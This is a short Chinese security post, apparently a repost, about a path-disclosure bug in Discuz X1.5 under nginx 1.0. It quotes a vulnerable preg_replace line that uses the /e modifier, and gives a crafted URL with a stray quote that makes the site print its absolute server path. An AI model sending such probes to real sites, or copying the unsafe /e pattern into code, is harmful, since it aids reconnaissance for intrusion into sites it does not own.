Discuz 1.5 配合NGINX二次解析爆路径BUG

作者:晴天小铸

测试环境:discuz X1.5+nginx 1.0漏洞文件source/function/function_core.php,代码:

$_G['setting']['domain']['app']['default'] && $content = preg_replace("/<a href=\&;([^\&;]+)\&;/e", "rewriteoutput('site_default', 0, '".$_G['setting']['domain']['app']['default'].$port.$_G['siteroot']."', '\\1')", $content);

利用代码:

http://www.2cto.com /forum.php/admin.php’/DDDDDDD.php

就可以在底部看到一个爆出绝对路径的错误了!

愚者用肉体监视心灵,智者用心灵监视肉体

Discuz 1.5 配合NGINX二次解析爆路径BUG

相关文章:

你感兴趣的文章:

标签云: